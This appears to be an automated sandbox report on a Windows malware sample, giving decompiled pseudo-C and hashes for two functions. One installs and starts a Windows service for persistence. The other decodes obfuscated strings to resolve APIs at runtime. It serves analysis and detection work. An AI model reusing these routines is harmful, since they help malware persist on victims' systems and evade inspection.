Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: _rand$AddressProc$CryptObjectRandomSingleWait_malloc
String ID: '9|'
API String ID: 2546460382-295376149
Opcode ID: e186c889972c504e6f626346e9fa6932d382f6157ba4cb9268c7ba02d231ae80
Instruction ID: b4c429150f19d38652474061a6f72774eb6e9f53eb12f2d2631aeeb445396fd7
Opcode Fuzzy Hash: e186c889972c504e6f626346e9fa6932d382f6157ba4cb9268c7ba02d231ae80
Instruction Fuzzy Hash: 8D6107F0E0060DDBEB10AF60FC85BAA3BB4FB46710F108656E454663A5EB718860FB56

Uniqueness

Uniqueness Score: -1.00%

Function 00F7B350 Relevance: 10.6, APIs: 7, Instructions: 102
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00F7B350(signed int __eax, char* _a4) {
				char _v5;
				intOrPtr _v12;
				void* _v16;
				long long _v24;
				int _t15;
				char* _t16;
				char* _t18;
				short _t25;
				intOrPtr _t29;
				short _t32;
				void* _t35;
				void* _t38;
				long long _t50;

				asm("fucompp");
				asm("fnstsw ax");
				asm("fld1");
				asm("fsubp st1, st0");
				if((__eax & 0x00000044) == 0) {
					 *0xfae570 = 0xffffac87;
				}
				_v5 = 0;
				_t15 = OpenSCManagerA(0, 0, 2); // executed
				_t35 = _t15;
				if(_t35 != 0) {
					_t16 =  *0xfb04ac; // 0x2731140
					_t38 = CreateServiceA(_t35, _t16, _t16, 0xf01ff, 0x110, 2, 0, _a4, 0, 0, 0, 0, 0);
					if(_t38 == 0) {
						_t18 =  *0xfb04ac; // 0x2731140
						_t50 =  *0xfae188 -  *0xfa7878;
						 *0xfae278 = _t50;
						_t38 = OpenServiceA(_t35, _t18, 0x10);
						if(_t38 != 0) {
							_t29 =  *0xfae318; // 0x8b0a
							_v12 = 0xdbdbf48d - _t29;
							asm("fild dword [ebp-0x8]");
							_v24 = _t50;
							 *0xfae050 =  *0xfae050 + _v24;
							goto L7;
						}
					} else {
						asm("fld1");
						asm("faddp st1, st0");
						_t32 =  *0xfae36c; // 0x0
						_v12 = _t32;
						_v24 =  *0xfae50c -  *0xfa7884 -  *0xfa7880;
						asm("fild dword [ebp-0x8]");
						_t25 = E00F7CABC();
						 *0xfae36c = _t25;
						_v16 =  &_v5;
						 *0xfb04e0(_t38, 1,  &_v16);
						L7:
						StartServiceA(_t38, 0, 0);
						CloseServiceHandle(_t38);
					}
					_t15 = CloseServiceHandle(_t35);
				}
				return _t15;
			}

0x00f7b368
0x00f7b36a
0x00f7b372
0x00f7b374
0x00f7b37f
0x00f7b386
0x00f7b386
0x00f7b393
0x00f7b397
0x00f7b39d
0x00f7b3a1
0x00f7b3aa
0x00f7b3d2
0x00f7b3d6
0x00f7b436
0x00f7b43b
0x00f7b445
0x00f7b451
0x00f7b455
0x00f7b457
0x00f7b468
0x00f7b46b
0x00f7b46e
0x00f7b47a
0x00000000
0x00f7b47a
0x00f7b3d8
0x00f7b3de
0x00f7b3e0
0x00f7b3ee
0x00f7b3fe
0x00f7b407
0x00f7b40a
0x00f7b410
0x00f7b41f
0x00f7b425
0x00f7b428
0x00f7b480
0x00f7b485
0x00f7b48c
0x00f7b48c
0x00f7b493
0x00f7b499
0x00f7b49e

APIs

OpenSCManagerA.SECHOST(00000000,00000000,00000002,?,?,?,?,00F63CD6,?), ref: 00F7B397
CreateServiceA.ADVAPI32(00000000,02731140,02731140,000F01FF,00000110,00000002,00000000,00F63CD6,00000000,00000000,00000000,00000000,00000000,02731058), ref: 00F7B3CC
ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?,?,?,?,00F63CD6,?), ref: 00F7B428
OpenServiceA.ADVAPI32(00000000,02731140,00000010,?,?,?,00F63CD6,?), ref: 00F7B44B
StartServiceA.ADVAPI32(00000000,00000000,00000000,?,?,?,00F63CD6,?), ref: 00F7B485
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00F63CD6,?), ref: 00F7B48C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00F63CD6,?), ref: 00F7B493

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: Service$CloseHandleOpen$ChangeConfig2CreateManagerStart
String ID:
API String ID: 643643595-0
Opcode ID: 11708643a62d886641d1588f31afa2a22da710177bddc78f2dcf553a022e9e33
Instruction ID: 2c408e869a04c5c692c6e9f92a85a5f6d103202dd1073ca507b1cfb93f20aee3
Opcode Fuzzy Hash: 11708643a62d886641d1588f31afa2a22da710177bddc78f2dcf553a022e9e33
Instruction Fuzzy Hash: 0731D2B1A0020DEFE7109F60FC4CBAE7BB4FB87710F208545E644A22A4EB704860EF55

Uniqueness

Uniqueness Score: -1.00%

Function 00F61380 Relevance: 258.6, APIs: 142, Strings: 4, Instructions: 3150
libraryloadersleepCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00F61380() {
				struct HINSTANCE__* _v8;
				signed int _v12;
				signed int _v20;
				long long _v28;
				signed int _v32;
				long long _v36;
				signed int _v48;
				signed int _v52;
				intOrPtr _v64;
				char _v84;
				char _v108;
				char _v132;
				char _v644;
				char _v1412;
				char _v1812;
				intOrPtr _t307;
				struct HINSTANCE__* _t312;
				signed char _t316;
				intOrPtr _t317;
				intOrPtr _t320;
				signed int _t322;
				intOrPtr _t328;
				intOrPtr _t330;
				CHAR* _t331;
				struct HINSTANCE__* _t332;
				CHAR* _t334;
				CHAR* _t337;
				CHAR* _t340;
				struct HINSTANCE__* _t342;
				CHAR* _t344;
				CHAR* _t347;
				struct HINSTANCE__* _t350;
				CHAR* _t352;
				CHAR* _t355;
				CHAR* _t359;
				intOrPtr _t361;
				CHAR* _t363;
				struct HINSTANCE__* _t365;
				CHAR* _t367;
				CHAR* _t375;
				CHAR* _t378;
				struct HINSTANCE__* _t380;
				CHAR* _t382;
				CHAR* _t385;
				CHAR* _t388;
				struct HINSTANCE__* _t390;
				CHAR* _t392;
				CHAR* _t395;
				CHAR* _t398;
				struct HINSTANCE__* _t400;
				CHAR* _t402;
				CHAR* _t405;
				CHAR* _t408;
				short _t409;
				CHAR* _t412;
				struct HINSTANCE__* _t414;
				CHAR* _t416;
				CHAR* _t421;
				struct HINSTANCE__* _t423;
				_Unknown_base(*)()* _t424;
				CHAR* _t430;
				CHAR* _t434;
				struct HINSTANCE__* _t436;
				CHAR* _t438;
				CHAR* _t441;
				CHAR* _t444;
				struct HINSTANCE__* _t447;
				CHAR* _t449;
				CHAR* _t452;
				CHAR* _t456;
				struct HINSTANCE__* _t458;
				CHAR* _t460;
				CHAR* _t463;
				signed char _t466;
				CHAR* _t467;
				CHAR* _t470;
				CHAR* _t475;
				CHAR* _t478;
				struct HINSTANCE__* _t480;
				CHAR* _t482;
				CHAR* _t485;
				CHAR* _t488;
				struct HINSTANCE__* _t490;
				CHAR* _t492;
				signed char _t500;
				CHAR* _t502;
				CHAR* _t505;
				struct HINSTANCE__* _t507;
				CHAR* _t509;
				_Unknown_base(*)()* _t511;
				CHAR* _t513;
				CHAR* _t516;
				CHAR* _t519;
				struct HINSTANCE__* _t521;
				CHAR* _t523;
				CHAR* _t526;
				struct HINSTANCE__* _t528;
				CHAR* _t530;
				CHAR* _t533;
				CHAR* _t536;
				struct HINSTANCE__* _t538;
				CHAR* _t540;
				CHAR* _t543;
				struct HINSTANCE__* _t545;
				CHAR* _t547;
				CHAR* _t549;
				struct HINSTANCE__* _t551;
				CHAR* _t553;
				CHAR* _t556;
				CHAR* _t559;
				struct HINSTANCE__* _t561;
				_Unknown_base(*)()* _t565;
				intOrPtr _t568;
				signed char _t569;
				struct HINSTANCE__* _t570;
				CHAR* _t572;
				struct HINSTANCE__* _t574;
				CHAR* _t576;
				CHAR* _t579;
				CHAR* _t584;
				_Unknown_base(*)()* _t586;
				CHAR* _t587;
				struct HINSTANCE__* _t589;
				CHAR* _t591;
				struct HINSTANCE__* _t592;
				CHAR* _t596;
				CHAR* _t599;
				struct HINSTANCE__* _t601;
				CHAR* _t603;
				CHAR* _t606;
				signed char _t610;
				struct HINSTANCE__* _t612;
				CHAR* _t613;
				struct HINSTANCE__* _t615;
				CHAR* _t618;
				struct HINSTANCE__* _t620;
				CHAR* _t622;
				signed char _t625;
				struct HINSTANCE__* _t627;
				CHAR* _t629;
				CHAR* _t632;
				signed long long _t635;
				signed char _t637;
				signed char _t639;
				struct HINSTANCE__* _t640;
				CHAR* _t642;
				CHAR* _t645;
				CHAR* _t648;
				intOrPtr _t649;
				CHAR* _t652;
				struct HINSTANCE__* _t654;
				CHAR* _t656;
				signed char _t658;
				CHAR* _t659;
				struct HINSTANCE__* _t661;
				CHAR* _t663;
				CHAR* _t666;
				CHAR* _t669;
				struct HINSTANCE__* _t671;
				CHAR* _t676;
				struct HINSTANCE__* _t678;
				CHAR* _t680;
				CHAR* _t683;
				struct HINSTANCE__* _t685;
				CHAR* _t687;
				CHAR* _t690;
				signed char _t694;
				CHAR* _t698;
				struct HINSTANCE__* _t700;
				CHAR* _t702;
				CHAR* _t707;
				void* _t710;
				void* _t711;
				signed char _t712;
				void* _t713;
				void* _t714;
				struct HINSTANCE__* _t715;
				char* _t717;
				CHAR* _t719;
				intOrPtr* _t724;
				intOrPtr* _t728;
				intOrPtr* _t729;
				void* _t733;
				intOrPtr _t736;
				signed int _t738;
				void* _t739;
				unsigned int _t740;
				void* _t743;
				unsigned int _t744;
				signed int _t745;
				signed int _t748;
				signed int _t749;
				intOrPtr _t750;
				intOrPtr _t751;
				signed int _t752;
				signed int _t754;
				void* _t760;
				unsigned int _t761;
				void* _t764;
				signed char _t768;
				void* _t771;
				void* _t772;
				void* _t780;
				signed int _t788;
				int _t792;
				signed int _t797;
				void* _t800;
				struct HINSTANCE__* _t802;
				signed int _t805;
				signed int _t807;
				signed int _t809;
				signed char _t816;
				void* _t818;
				void* _t822;
				intOrPtr _t823;
				void* _t824;
				signed int _t825;
				void* _t827;
				void* _t828;
				signed int _t830;
				void* _t831;
				signed int _t837;
				intOrPtr _t839;
				signed char _t842;
				signed int _t846;
				intOrPtr _t848;
				signed int _t852;
				struct HINSTANCE__* _t853;
				CHAR* _t858;
				intOrPtr* _t864;
				signed int _t865;
				struct HINSTANCE__* _t871;
				void* _t880;
				short _t884;
				struct HINSTANCE__* _t889;
				intOrPtr _t894;
				CHAR* _t898;
				struct HINSTANCE__* _t901;
				signed int _t905;
				signed int _t907;
				signed int _t908;
				CHAR* _t909;
				void* _t910;
				intOrPtr _t911;
				signed int _t912;
				intOrPtr _t914;
				struct HINSTANCE__* _t917;
				struct HINSTANCE__* _t918;
				struct HINSTANCE__* _t919;
				struct HINSTANCE__* _t924;
				struct HINSTANCE__* _t926;
				struct HINSTANCE__* _t927;
				struct HINSTANCE__* _t928;
				struct HINSTANCE__* _t929;
				signed int _t933;
				signed int _t935;
				struct HINSTANCE__* _t938;
				struct HINSTANCE__* _t939;
				struct HINSTANCE__* _t940;
				struct HINSTANCE__* _t941;
				struct HINSTANCE__* _t942;
				struct HINSTANCE__* _t943;
				struct HINSTANCE__* _t944;
				struct HINSTANCE__* _t945;
				struct HINSTANCE__* _t946;
				struct HINSTANCE__* _t947;
				struct HINSTANCE__* _t948;
				struct HINSTANCE__* _t949;
				struct HINSTANCE__* _t952;
				struct HINSTANCE__* _t953;
				struct HINSTANCE__* _t954;
				struct HINSTANCE__* _t955;
				struct HINSTANCE__* _t956;
				signed int _t958;
				signed int _t959;
				struct HINSTANCE__* _t961;
				struct HINSTANCE__* _t962;
				struct HINSTANCE__* _t963;
				struct HINSTANCE__* _t964;
				intOrPtr _t967;
				struct HINSTANCE__* _t968;
				struct HINSTANCE__* _t969;
				struct HINSTANCE__* _t970;
				struct HINSTANCE__* _t973;
				struct HINSTANCE__* _t976;
				struct HINSTANCE__* _t977;
				intOrPtr _t978;
				struct HINSTANCE__* _t980;
				struct HINSTANCE__* _t982;
				struct HINSTANCE__* _t983;
				intOrPtr _t985;
				char _t987;
				char _t988;
				signed int _t990;
				signed int _t991;
				signed int _t992;
				void* _t993;
				signed int _t994;
				signed int _t996;
				int _t999;
				void* _t1001;
				signed int _t1002;
				signed int _t1004;
				int _t1007;
				intOrPtr _t1009;
				void* _t1012;
				void* _t1014;
				signed int _t1015;
				signed int _t1017;
				int _t1020;
				intOrPtr _t1023;
				void* _t1028;
				intOrPtr _t1031;
				void* _t1035;
				void _t1037;
				signed int _t1039;
				intOrPtr _t1044;
				signed int _t1045;
				signed int _t1047;
				signed int _t1051;
				intOrPtr _t1052;
				intOrPtr* _t1055;
				struct HINSTANCE__* _t1056;
				void* _t1057;
				void _t1059;
				signed int _t1061;
				struct HINSTANCE__* _t1067;
				intOrPtr _t1068;
				signed int _t1070;
				intOrPtr _t1073;
				struct HINSTANCE__* _t1074;
				intOrPtr _t1076;
				signed long long _t1077;
				signed int _t1079;
				intOrPtr _t1080;
				struct HINSTANCE__* _t1082;
				struct HINSTANCE__* _t1083;
				intOrPtr _t1084;
				struct HINSTANCE__* _t1085;
				struct HINSTANCE__* _t1086;
				intOrPtr _t1087;
				struct HINSTANCE__* _t1089;
				struct HINSTANCE__* _t1090;
				struct HINSTANCE__* _t1091;
				struct HINSTANCE__* _t1092;
				struct HINSTANCE__* _t1093;
				intOrPtr _t1094;
				struct HINSTANCE__* _t1095;
				struct HINSTANCE__* _t1099;
				struct HINSTANCE__* _t1100;
				struct HINSTANCE__* _t1101;
				struct HINSTANCE__* _t1102;
				struct HINSTANCE__* _t1103;
				struct HINSTANCE__* _t1104;
				struct HINSTANCE__* _t1105;
				struct HINSTANCE__* _t1106;
				struct HINSTANCE__* _t1107;
				struct HINSTANCE__* _t1108;
				struct HINSTANCE__* _t1109;
				struct HINSTANCE__* _t1110;
				struct HINSTANCE__* _t1111;
				struct HINSTANCE__* _t1112;
				struct HINSTANCE__* _t1113;
				intOrPtr _t1116;
				struct HINSTANCE__* _t1120;
				struct HINSTANCE__* _t1121;
				struct HINSTANCE__* _t1123;
				struct HINSTANCE__* _t1124;
				struct HINSTANCE__* _t1125;
				struct HINSTANCE__* _t1126;
				struct HINSTANCE__* _t1130;
				struct HINSTANCE__* _t1131;
				struct HINSTANCE__* _t1132;
				struct HINSTANCE__* _t1133;
				struct HINSTANCE__* _t1134;
				struct HINSTANCE__* _t1135;
				intOrPtr _t1136;
				struct HINSTANCE__* _t1138;
				struct HINSTANCE__* _t1139;
				struct HINSTANCE__* _t1140;
				struct HINSTANCE__* _t1141;
				struct HINSTANCE__* _t1142;
				void* _t1145;
				signed int _t1148;
				signed int _t1150;
				signed int _t1152;
				CHAR* _t1154;
				signed int _t1156;
				signed int _t1157;
				struct HINSTANCE__* _t1161;
				signed int _t1162;
				intOrPtr _t1164;
				signed short _t1166;
				intOrPtr _t1167;
				signed int _t1168;
				void* _t1169;
				void* _t1170;
				struct HINSTANCE__* _t1176;
				void _t1177;
				signed int _t1178;
				signed int _t1179;
				signed int _t1181;
				intOrPtr _t1182;
				signed char _t1184;
				intOrPtr _t1185;
				signed int _t1186;
				intOrPtr _t1187;
				signed int _t1189;
				struct HINSTANCE__* _t1191;
				void _t1192;
				signed int _t1193;
				struct HINSTANCE__* _t1194;
				intOrPtr _t1195;
				struct HINSTANCE__* _t1196;
				struct HINSTANCE__* _t1197;
				signed int _t1201;
				struct HINSTANCE__* _t1202;
				CHAR* _t1210;
				CHAR* _t1227;
				CHAR* _t1228;
				CHAR* _t1237;
				CHAR* _t1238;
				CHAR* _t1247;
				CHAR* _t1252;
				CHAR* _t1255;
				void* _t1259;
				void* _t1265;
				void* _t1269;
				void* _t1271;
				void* _t1275;
				char* _t1277;
				void* _t1279;
				intOrPtr _t1286;
				void* _t1287;
				intOrPtr _t1294;
				CHAR* _t1308;
				signed int _t1309;
				CHAR* _t1334;
				CHAR* _t1336;
				void* _t1350;
				void* _t1351;
				signed int _t1352;
				void* _t1353;
				void* _t1357;
				signed int _t1358;
				void* _t1361;
				void* _t1363;
				void* _t1364;
				void* _t1365;
				void* _t1378;
				void* _t1403;
				void* _t1413;
				void* _t1427;
				void* _t1434;
				void* _t1445;
				void* _t1450;
				void* _t1454;
				void* _t1455;
				void* _t1460;
				void* _t1465;
				void* _t1471;
				void* _t1476;
				void* _t1477;
				void* _t1478;
				void* _t1479;
				void* _t1480;
				void* _t1481;
				void* _t1482;
				void* _t1483;
				void* _t1485;
				void* _t1487;
				void* _t1488;
				void* _t1489;
				void* _t1490;
				void* _t1497;
				void* _t1498;
				void* _t1499;
				void* _t1500;
				void* _t1501;
				void* _t1504;
				void* _t1505;
				void* _t1506;
				void* _t1509;
				void* _t1510;
				intOrPtr _t1520;
				void* _t1550;
				void* _t1552;
				signed int _t1554;
				long long _t1563;
				signed int _t1567;
				signed long long _t1572;
				signed int _t1574;
				long long _t1576;
				signed long long _t1582;
				signed long long _t1584;
				signed int _t1594;
				signed int _t1597;
				void* _t1599;
				long long _t1612;
				signed int _t1616;
				signed int _t1617;
				signed int _t1630;
				signed long long _t1637;
				long long _t1641;
				long long _t1654;
				signed int _t1666;
				signed int _t1667;
				long long _t1670;
				signed int _t1671;
				signed int _t1673;
				signed int _t1677;
				signed int _t1680;
				signed int _t1682;
				long long _t1687;
				signed int _t1695;
				signed int _t1696;
				signed long long _t1698;
				long long _t1707;
				signed long long _t1708;
				long long _t1712;
				signed int _t1715;
				signed int _t1731;
				signed int _t1733;
				signed int _t1752;
				signed int _t1756;
				signed int _t1761;

				_t908 = _t907 | 0xffffffff;
				 *0xfae45c =  *0xfae45c + _t908;
				_t307 =  *0xfae45c; // 0x386cf1b3
				_v32 = _t307 - 0x489a5b35;
				asm("fild dword [ebp-0x1c]");
				_v12 = _t1554;
				 *0xfae548 =  *0xfae548 * _v12;
				 *0xfae438 =  *0xfae438 +  *0xfa8330;
				_t911 =  *0xfae0cc; // 0x35085801
				_t1076 =  *0xfae280; // 0xf447b558
				_t912 =  *0xfae234; // 0x82cc2880
				 *0xfae234 = _t912 * (0xf8cb0737 - _t911 + _t1076);
				 *0xfae0cc =  *0xfae0cc + 1;
				asm("fld1");
				asm("fxch st0, st1");
				 *0xfae160 =  *0xfae160 - st0;
				_t1077 =  *0xfae160; // 0x33000000
				_t312 =  *0xfae164; // 0xc1bd5c4f
				_v12 = _t1077;
				_v8 = _t312;
				asm("fsubr qword [ebp-0x8]");
				 *0xfae3e8 = E00F7CABC();
				_t914 =  *0xfae51c; // 0x7027
				 *0xfb0288 = 0;
				 *0xfb02e4 = 1;
				 *0xfae4d4 =  *0xfae4d4 + 0xb34e00ca - _t914;
				 *0xfafc2c = 0;
				asm("fsubr qword [0xfae2c8]");
				 *0xfafc84 = 0;
				 *0xfafb1c = 0;
				 *0xfb030c = 1;
				 *0xfb0744 = 0;
				 *0xfb04ec = 0;
				 *0xfb02d4 = 0;
				 *0xfae2c8 =  *0xfae044;
				_t316 =  *0xfae1c0; // 0xa814
				_t1563 =  *0xfae2c8 +  *0xfa8328;
				_v32 = _t316;
				_v12 = _t1563;
				asm("fild dword [ebp-0x1c]");
				asm("fsubr qword [ebp-0x8]");
				_v36 = _t1563;
				_v12 =  *0xfae3b8 -  *0xfa8320;
				_t1567 =  *0xfae110 + _v12;
				asm("fcomp qword [ebp-0x20]");
				asm("fnstsw ax");
				asm("fld1");
				if((_t316 & 0x00000001) != 0) {
					st0 = _t1567;
				} else {
					 *0xfae584 =  *0xfae584 - st1;
					_v36 =  *0xfae448;
					_v12 =  *0xfae02c;
					_t1567 =  *0xfae584;
					asm("fsubr qword [ebp-0x8]");
					asm("fsubr qword [ebp-0x20]");
					 *0xfae448 = _t1567;
					asm("fsubr dword [0xfae02c]");
					 *0xfae02c = _t1567;
				}
				_t1079 =  *0xfae024; // 0x80000001
				_v32 = _t1079;
				asm("fild dword [ebp-0x1c]");
				 *0xfb0478 = 0;
				 *0xfb04c8 = 0;
				 *0xfb04cc = 0;
				 *0xfb0320 = 0;
				 *0xfb0298 = 0;
				 *0xfae25c = _t1567;
				 *0xfae024 =  *0xfae024 + 1;
				_t1294 =  *0xfa3568; // 0xea15a919
				_t317 = E00F7CBC4(_t1079, 0, _t1294, 0x3ff0); // executed
				_t1365 = _t1364 + 4;
				 *0xfb04c0 = _t317;
				_t1515 = _t317;
				if(_t317 == 0) {
					_t905 =  *0xfae180; // 0x7247
					_v32 = _t905;
					asm("fild dword [ebp-0x1c]");
					_v12 = _t1567;
					asm("fsubp st1, st0");
					asm("fsubr qword [ebp-0x8]");
					 *0xfae180 = E00F7CABC();
					_t1567 =  *0xfae078;
					asm("fld1");
					asm("faddp st1, st0");
					 *0xfae078 = _t1567;
					_t317 = E00F7DF62(0);
				}
				E00F7C990(_t317, 0, 0x3ff0);
				_t1080 =  *0xfb04c0; // 0x27328f0
				E00F71B00(_t1567, _t1080, 0xffc, _t1294);
				_t320 =  *0xfb04c0; // 0x27328f0
				_t322 =  *(_t320 + 0x10) ^  *0xfa3570;
				_v32 = _t322;
				 *0xfafc9c = _t322;
				 *0xfb050c = E00F6CF90(_t1515, _t1567, 0xc6a, 0x20);
				 *0xfb0494 = E00F6CF90(_t1515, _t1567, 0xede, 0x16);
				 *0xfb026c = E00F6CF90(_t1515, _t1567, 0x23e3, 0x16);
				 *0xfae580 =  *0xfae580 + _t908;
				_v8 =  *0xfae580 & 0x0000ffff;
				asm("fild dword [ebp-0x4]");
				_v12 = _t1567;
				 *0xfae3e0 =  *0xfae3e0 + _v12;
				 *0xfb031c = E00F6CF90(_t1515,  *0xfae3e0 + _v12, 0x14fc, 0x16);
				 *0xfb04b8 = E00F6CF90(_t1515,  *0xfae3e0 + _v12, 0x3058, 0x34);
				_t328 = E00F6CF90(_t1515,  *0xfae3e0 + _v12, 0x15c0, 0x34);
				 *0xfb04f8 = _t328;
				 *0xfb04ac = _t328;
				 *0xfb04b0 = E00F6CF90(_t1515,  *0xfae3e0 + _v12, 0x24b6, 0x20);
				_t330 = E00F6CF90(_t1515,  *0xfae3e0 + _v12, 0xc9, 0x21);
				_v12 =  *0xfae60c;
				 *0xfafc74 = _t330;
				_t1572 =  *0xfae2f0 * _v12;
				 *0xfae60c = _t1572;
				_t331 = E00F6CF90(_t1515, _t1572, 0x308e, 0x11);
				_t909 = GetProcAddress;
				_t332 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0430 = GetProcAddress(_t332, _t331);
				_t334 = E00F6CF90(_t1515, _t1572, 0x1603, 0xc);
				E00F76570(0x11, _t331);
				_t917 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0468 = GetProcAddress(_t917, _t334);
				_t337 = E00F6CF90(_t1515, _t1572, 0x1a22, 0xd);
				E00F76570(0xc, _t334);
				_t1082 =  *0xfafc6c; // 0x74ca0000
				 *0xfafc38 = GetProcAddress(_t1082, _t337);
				 *0xfae080 = 0xf362bf6c;
				_t340 = E00F6CF90(_t1515, _t1572, 0x37e2, 0xe);
				E00F76570(0xd, _t337);
				_t342 =  *0xfafc6c; // 0x74ca0000
				 *0xfb04c4 = GetProcAddress(_t342, _t340);
				_t344 = E00F6CF90(_t1515, _t1572, 0x12da, 0xc);
				E00F76570(0xe, _t340);
				_t918 =  *0xfafc6c; // 0x74ca0000
				 *0xfb049c = GetProcAddress(_t918, _t344);
				_t347 = E00F6CF90(_t1515, _t1572, 0x30a1, 0x11);
				_t1083 =  *0xfae4d0; // 0x6c745516
				_v8 = _t1083;
				asm("fild dword [ebp-0x4]");
				_v12 = _t1572;
				_t1574 =  *0xfae134 + _v12;
				 *0xfae0e4 = E00F7CABC();
				E00F76570(0xc, _t344);
				_t350 =  *0xfafc6c; // 0x74ca0000
				 *0xfb075c = GetProcAddress(_t350, _t347);
				_t352 = E00F6CF90(_t1515, _t1574, 0x2af2, 0x13);
				E00F76570(0x11, _t347);
				_t919 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0500 = GetProcAddress(_t919, _t352);
				_t355 = E00F6CF90(_t1515, _t1574, 0xfa9, 0x12);
				_t1084 =  *0xfae44c; // 0x2575
				_v8 = 0x375b5cf - _t1084;
				asm("fild dword [ebp-0x4]");
				_v12 = _t1574;
				_t1576 =  *0xfae448 + _v12;
				 *0xfae448 = _t1576;
				E00F76570(0x13, _t352);
				_t1085 =  *0xfafc6c; // 0x74ca0000
				 *0xfafb14 = GetProcAddress(_t1085, _t355);
				_t359 = E00F6CF90(_t1515, _t1576, 0xe5f, 0x10);
				E00F76570(0x12, _t355);
				 *0xfae01c =  *0xfae01c + 1;
				_t361 =  *0xfae01c; // 0x9b827a58
				_t1086 =  *0xfafc6c; // 0x74ca0000
				_v8 = 0x5873e6f1 - _t361;
				asm("fild dword [ebp-0x4]");
				 *0xfae120 = _t1576;
				 *0xfafc68 = GetProcAddress(_t1086, _t359);
				_t363 = E00F6CF90(_t1515, _t1576, 0x1e33, 0xf);
				E00F76570(0x10, _t359);
				_t365 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0740 = GetProcAddress(_t365, _t363);
				_t367 = E00F6CF90(_t1515, _t1576, 0x139, 0xa);
				E00F76570(0xf, _t363);
				_t924 =  *0xfafc6c; // 0x74ca0000
				 *0xfafb18 = GetProcAddress(_t924, _t367);
				_t1210 = E00F6CF90(_t1515, _t1576, 0x3720, 9);
				E00F76570(0xa, _t367);
				_t1087 =  *0xfae4e8; // 0x6bb26d6d
				_t1378 = _t1365 + 0x110;
				_t1516 = ( *0xfae59c & 0x0000ffff) - 0x5ce7c64c - _t1087;
				if(( *0xfae59c & 0x0000ffff) <= 0x5ce7c64c - _t1087) {
					 *0xfae018 = 0xffffe659;
				}
				_t926 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0308 = GetProcAddress(_t926, _t1210);
				_t375 = E00F6CF90(_t1516, _t1576, 0xf98, 0xf);
				E00F76570(9, _t1210);
				_t1089 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0738 = GetProcAddress(_t1089, _t375);
				_t378 = E00F6CF90(_t1516, _t1576, 0xdef, 0xe);
				E00F76570(0xf, _t375);
				_t380 =  *0xfafc6c; // 0x74ca0000
				 *0xfb04fc = GetProcAddress(_t380, _t378);
				_t382 = E00F6CF90(_t1516, _t1576, 0x241c, 0x19);
				E00F76570(0xe, _t378);
				_t927 =  *0xfafc6c; // 0x74ca0000
				 *0xfafb00 = GetProcAddress(_t927, _t382);
				_t385 = E00F6CF90(_t1516, _t1576, 0x2ac6, 0xd);
				E00F76570(0x19, _t382);
				_t1090 =  *0xfafc6c; // 0x74ca0000
				 *0xfafc28 = GetProcAddress(_t1090, _t385);
				_t388 = E00F6CF90(_t1516, _t1576, 0x3e2e, 0x13);
				E00F76570(0xd, _t385);
				asm("fsubr qword [0xfa8310]");
				 *0xfae1e4 =  *0xfae5c8;
				_t390 =  *0xfafc6c; // 0x74ca0000
				 *0xfae5c8 =  *0xfae5c8 +  *0xfa75c8;
				 *0xfb04a0 = GetProcAddress(_t390, _t388);
				_t392 = E00F6CF90(_t1516,  *0xfae5c8 +  *0xfa75c8, 0x3014, 0xd);
				E00F76570(0x13, _t388);
				_t928 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0464 = GetProcAddress(_t928, _t392);
				_t395 = E00F6CF90(_t1516,  *0xfae5c8 +  *0xfa75c8, 0x37a6, 0xf);
				E00F76570(0xd, _t392);
				_t1091 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0450 = GetProcAddress(_t1091, _t395);
				_t1582 =  *0xfae418 -  *0xfa8308 -  *0xfa8300;
				 *0xfae2d0 = _t1582;
				_t398 = E00F6CF90(_t1516, _t1582, 0x2169, 0x15);
				E00F76570(0xf, _t395);
				_t400 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0268 = GetProcAddress(_t400, _t398);
				_t402 = E00F6CF90(_t1516, _t1582, 0x2a9f, 0xc);
				E00F76570(0x15, _t398);
				_t929 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0764 = GetProcAddress(_t929, _t402);
				_t405 = E00F6CF90(_t1516, _t1582, 0x3838, 0xa);
				E00F76570(0xc, _t402);
				_t1092 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0278 = GetProcAddress(_t1092, _t405);
				_t408 = E00F6CF90(_t1516, _t1582, 0x21ae, 0xa);
				_t409 =  *0xfae570; // 0x8c19
				_v8 = _t409 + 0x18ab98f7;
				asm("fild dword [ebp-0x4]");
				 *0xfae418 = _t1582;
				 *0xfae570 =  *0xfae570 - 1;
				E00F76570(0xa, _t405);
				_t1093 =  *0xfafc6c; // 0x74ca0000
				 *0xfb04e8 = GetProcAddress(_t1093, _t408);
				_t412 = E00F6CF90(_t1516, _t1582, 0x218a, 0xe);
				E00F76570(0xa, _t408);
				_t414 =  *0xfafc6c; // 0x74ca0000
				 *0xfafc5c = GetProcAddress(_t414, _t412);
				_t416 = E00F6CF90(_t1516, _t1582, 0x3664, 0xf);
				E00F76570(0xe, _t412);
